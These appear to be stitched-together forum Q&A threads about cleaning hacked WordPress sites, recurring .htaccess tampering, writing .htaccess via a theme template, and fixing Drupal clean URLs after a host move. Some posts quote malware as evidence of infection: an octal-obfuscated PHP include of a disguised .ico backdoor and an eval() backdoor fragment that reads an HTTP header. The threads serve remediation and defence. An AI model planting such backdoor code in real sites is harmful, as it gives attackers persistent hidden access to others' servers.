I have two wordpress websites on my dedicated server, and the htaccess files of both websites keeps changing to default one and become 444 chmod.
Even after i fix it and put chmod 444 of mine few days later it changes again on both websites.
Could you please help me make the htaccess files impossible to be overwritten or edited no matter what?
I will appreciate any help,
Thank you
I find my infected file in one of the themes of wordpress, so you have two ways
LogIn to wordpress and delete all the new themes that you are not using.
Go to you your admin page go to folder: wp-content/themes/sydney/404.php
open it and if you see the virus code like if it has +xml or Rewrite wordpress etc delete it.
go through all the themes folder 404.php pages.
change your wp login user name and password.
delete all the infected .htaccess files/remove the infected code and monitor your website the regularly and check ur .htaccess file to make sure you don't get attacked again.
I have resolved this by scanning my ubuntu server using clamAv through SSH.
Here is the command line I used:
clamav -ril /home/user/clamav.txt
The results revealed a backdoor script embedded in one of my old themes which wasn't even activated. I deleted that old theme entirely and rebooted my server then the problem is gone.
Don't waste your time with a WordPress plugin to scan for malware or
backdoor because that is unlikely to locate any virus. Install ClamAV
into your server then scan. If nothing is detected yet?! Install
another anti similar to ClamAV until you succeed to locate the threat.
Related
I have a problem with my website, I get information from wordfence about my WordPress website getting hacked
enter image description here add found a code eval($_SERVER['HTTP_81DB2B3'] so i removed it but in a few second the code going back. someone, please help me
I had something very similar to this. Go to your cPanel and search for "Cron Jobs" and scroll down to see if there's any malicious cronjobs setup. You might have some that look like eval(gzinflate(base64_decode(.... that are essentially causing this to reoccur. Not a complete fix to this issue, but you'll have to delete those cronjobs to ensure that that line of code doesn't keep reappearing. In addition to that, you'll also need to make sure those cronjobs don't show up again. Use a plugin like Wordfence (suggested above as well) to look for malicious files and if it helps replace your home directory (except for wp-content and wp-config) with fresh files.
If your website got hacked then I guess more than 1 file was affected by it,
case-1: If you are able to access the Wordpress Backend In this case, if you are able to access the Wordpress backend then I suggest you
Step-1: Add one plugin called (Wordfence Security – Firewall & Malware Scan
) and scan your website with it.
Step-2: After scanning the site remove all suspicious code from the site.
Case 2: If you are not able to access the Wordpress backend then you have to update your Wordpress manually with the hosting file manager or FTP.
Please Note: Please take a backup of your website before do any changes.
I've got a site that has been hacked for the fourth time now this month. With scripts hosted on autofaucet.org. (sloppy code even, found their names. Some Russian dudes. But that's off topic) I've taken some measurements to prevent a new hack, but alas...
I've installed a clean WP installation on the server, with clean files and a clean DB.
reinstalled the plugins clean
I have All In One WP Security & Firewall plugin for file scanning, firewall, hide inlog page, etc.
Changed all the wordpress passwords.
I've notices the encoded code is being placed in files called assets.php.
I'm curious how a hacker would inject/place the code on the server. How to prevent it better and what questions to ask the webhost company. I've asked them before and they just say it's my fault, update the wp installation and move on. What should they check if the code is injected from their side?
Your log files (of the web server) e.g. /var/log/nginx/access.log with the nginx web server will tell you who it was. Look for the change date/time of the assets.php file. Then check server access logs for IP addresses from that exact time. Then search logs for that IP address. You will find the first accesses by that IP address. That was likely the hack.
Usually Wordpress plugins are to blame as long as you keep the WP site updated. So, you could disable plugins not needed urgently, and disable the others one by one, or all for testing.
As a workaround, you can make the index.php (or other) file under attack read-only. In the past I have worked around particular attacks by chown root.root filetobeattacked.php which usually works (but may hinder updates, so it's a temporary solution). If you are not root on the server (shared hosting) perhaps chmod 444 filetobeattacked.php could work.
I had same issue before. It might be the wordpress core files.
Delete all files except wp-content, then download and replace it with the new wordpress files.
Search for 'autofaucet.org' inside wp-content, and remove if necessary.
Open wp-contents/themes/ then check functions.php - check if any additional code is there on top. Check the last updated files and time inside the theme and plugins.
Export database files and searcg for 'autofaucet.org' and remove if any item found.
It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated Wordpress to latest (themes and plugins)
However, the code again repeated. What can be good solutions?
p.s. I am using siteground.
Thanks
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
Reinstall all plugins, fresh downloads
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
you can also visit this link too
https://naderzad.info/web-development/wordpress-code-injection/
I have no access to my FTP but I'm able to edit the web through Wordpress. Is there any way I could perhaps generate the .htaccess file through the admin framework? I know there might be a plugin to do that, but bear in mind I have no FTP access and the plugins require it to be installed.
I need the .htaccess file to redirect the user to another site.
I know this might strike you as weird and stupid, but this is due to the company's central decision to keep the site hosted by, I guess, a "friendly" hosting company. There's no way of recovering the login/password for FTP, so this might be the only solution.
Please, try posting constructive comments only, no "contact the hosting company". If I could, I would.
If your hosting company has set up wordpress correctly, then there is no way to do this, because unix permissions should make .htaccess read-only to the owner of the web server.
If the company has not done this, and if you have a way to change the templates, you might have success by creating a template that contains php code to open and write the .htaccess file.
Sample code to be put at the top of the header.php:
echo 'Current dir: ',getcwd(),"<br>\n";
if ($handle=opendir('.')) {
while (($file=readdir($handle))!==false) {
$ok=(is_writable($file) ? "ok" : "can't write");
echo "file '$file': $ok<br>\n";
}
closedir($handle);
}
This is to test you're in the root directory of your wordpress installation. It should give you the current directory, a list of all files in that directory (expect .htaccess, index.php, and various wp-* files), and their writability.
Once you've checked everything is correct, add
file_put_contents('.test', "RewriteEngine On\nRewriteRule ^(.*)$ site.com$1 [R=301,QSA,L]\n");
echo("<code><pre>-------- included file starts here\n");
include(".test");
echo("-------- included file ends here</pre></code>\n");
to the php code. This writes to a test file and includes it so you can check if everything is ok. When you've checked the file contents, replace .test with .htaccess.
WARNING: You should be VERY sure about the content of .htaccess. file_put_contents doesn't append the new string, it overwrites the whole file. Once you've written a bad .htaccess file, you might not be able to ever change it again, because the web server will redirect you to the new site instead of executing the script on the old site.
I am sorry for your situation. What is the hosting company (will keep this in mind if I ever use them). To try to help:
Do you have access to CPanel? Most hosting providers give it out of the box. Cpanel has a file manager.
Research Wordpress file managers (http://wordpress.org/plugins/wp-filemanager/)
How to edit wordpress .htaccess file from hosting Cpanel: If you are currently unable to login in your wordpress dashboard, or facing 500 internal server error. There is 90% possibility that you were editing your .htaccess file from your wordpress dashboard. In this situation you can only fix your wordpress .htaccess file by editing it from cpanel. Editing .htaccess file from wordpress dashboard is little risky with .htaccess editor plugins. If you will implement any wrong code then you might face 500 internal server error and your site might crush. So first you should take a backup of your existing .htaccess file before editing it. If you have a backup of your wordpress .htaccess file then you can upload it through your hosting cpanel also.
https://howtoways.com/how-to-edit-wordpress-htaccess-file-from-hosting-cpanel/
I have copied an existing drupal 6 site to a new host. I thought it was an easy task. Just change the mysql login credentials and run. But obviously not. Fist page is up and runing, but all links to existing pages doesn't work.
What am I missing here? Another configuration I've missed.
The Drupal 6 installation is a NodeStream distibution.
Link to site:
http://u0002002.fsdata.se
It is likely that you forgot to set up mod_rewrite so the nice urls don't work.
It is almost certain mod_rewrite is not turned on you can access pages like this
http://u0002002.fsdata.se/?q=yrke-karriar
To resolve quickly:
Turn off clean urls (don't know the exact url in Drupal 6)
Flush all caches
This will resolve until you can get mod_rewrite turned on or working.
A very common (and even easier to fix) problem that happens when moving hosts is that you forget to include the .htaccess file which can cause problems with clean URLs too.
Fix: Upload a fresh copy of the .htaccess file that comes with Drupal to your web root directory.
I have found out that sometimes I miss this file. This is because I installed Drupal by dragging all the files and folders over to my server, but since the .htaccess file starts with a period, OS X hides it. This means that the .htaccess file was never moved over. - Source DrupalDude.com
And from Drupal.org directly, Clean URLs not working? Check your .htaccess file
Check if the .htaccess file was actually uploaded. It should be in the directory where you uploaded Drupal (for example: /public_html/drupal/)
If the .htaccess file is missing, you need to upload it. If you accidentally deleted this file, just download Drupal again, and copy the new .htaccess file.
Make sure the file is only called .htaccess and not htaccess.txt or anything else. The .period .at .the .beginning is required.
This name usually means that the file will be invisible on folder listings on Unix-based systems so you might not always see it. If using an FTP client, you may have to configure it to 'show hidden files'. If listing on the commandline, you must ls -la to see it. This will be somewhat dependent on your OS.
Here are two tutorials which may help you:
How to move a Drupal site from one host to another
How to Move a Drupal Site to a New Host Without Going Crazy